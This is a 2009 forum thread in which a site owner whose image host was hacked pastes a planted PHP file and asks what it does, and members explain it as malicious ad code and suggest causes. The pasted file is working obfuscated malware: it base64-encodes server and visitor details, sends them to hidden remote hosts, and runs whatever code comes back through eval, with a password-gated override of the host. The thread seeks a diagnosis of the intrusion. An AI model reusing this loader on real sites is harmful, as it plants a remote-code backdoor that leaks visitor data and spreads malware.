Results 1 to 10 of 17
-
10th Jun 2009, 01:26 PM #1OPMember
what hacker do with this php script
My image hosting site got hacked. the hacker placed .htaccess files and some php files with random name. he insterted the files in all most every image folder. so i would like to know what is the output of the php script
Code:<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="72951d9f890543cc69aa7aa29a5b0609") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
vgnheart Reviewed by vgnheart on . what hacker do with this php script My image hosting site got hacked. the hacker placed .htaccess files and some php files with random name. he insterted the files in all most every image folder. so i would like to know what is the output of the php script <? Rating: 5
-
10th Jun 2009, 05:52 PM #2(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comSeen this before.
Isn't a shell, it's a piece of ad code which shows a malicious virus-infected ad.
-
10th Jun 2009, 06:04 PM #3MemberWebsite's:
unknown-bb.comive also seen this before and some 1 decoded it and it was a website link with a virus
http://unknown-bb.com/ // http://www.cheekytunes.co.uk ONLINE RADIO
-
10th Jun 2009, 06:13 PM #4OPMember
i tried opening those files in firefox . I mean files on the server. but only getting blank page. I am not going to take risk , deleting all those files
-
10th Jun 2009, 06:32 PM #5Member
It a link to other sites which has that virus...just delete them
Good Bye Warez Scene (y)
-
26th Jun 2009, 04:52 AM #6MemberWebsite's:
profithost.net netbuilders.orgProbably an injection into your web code. Try to keep CHMOD settings accurate and dont use buggy scripts.
Profithost is your host. Started in 2005, and one of the major dedicated server providers in The Netherlands. Visit us right now on http://www.profithost.net !!
Add us on Twitter: http://twitter.com/stockinvest
-
26th Jun 2009, 05:34 AM #7MemberWebsite's:
qwerty-roms.netSearch milw0rm.com with your script name, if you use scripts, include version. It will tell you any exploits for your script.
-
26th Jun 2009, 09:01 AM #8Respected DeveloperWebsite's:
X4B.org
-
26th Jun 2009, 11:26 AM #9(╯?□?)╯︵ ┻━┻Website's:
Xenu.ws WarezLinkers.com SerialSurf.com CracksDirect.comI guess you last 3 posters didnt bother reading my post then?
lol
unless that is, you mean "how did it get there". In that case, probably someone with access via an RFU exploit.
-
26th Jun 2009, 09:13 PM #10MemberWebsite's:
qwerty-roms.netI think we were under the impresstion that -
If he was exploited once, hell knows how many other shellcodes he has had on his system.
Sponsored Links
Thread Information
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Similar Threads
-
Hacker on a roll!!
By nYXem in forum General DiscussionReplies: 19Last Post: 25th Oct 2011, 02:56 PM -
hacker on KWWH
By kuzukuzu in forum General DiscussionReplies: 19Last Post: 6th Jun 2011, 09:42 AM -
Need a Hacker.
By -saMmy- in forum Completed TransactionsReplies: 10Last Post: 13th Sep 2010, 06:45 PM -
[Buying] need a hacker
By downloadmaster in forum Completed TransactionsReplies: 6Last Post: 12th Feb 2010, 06:25 PM -
Any pro hacker here?
By anti-human in forum General DiscussionReplies: 5Last Post: 5th Sep 2009, 03:27 PM
themaRegister - register to forums...
Version 3.54 released. Open older version (or...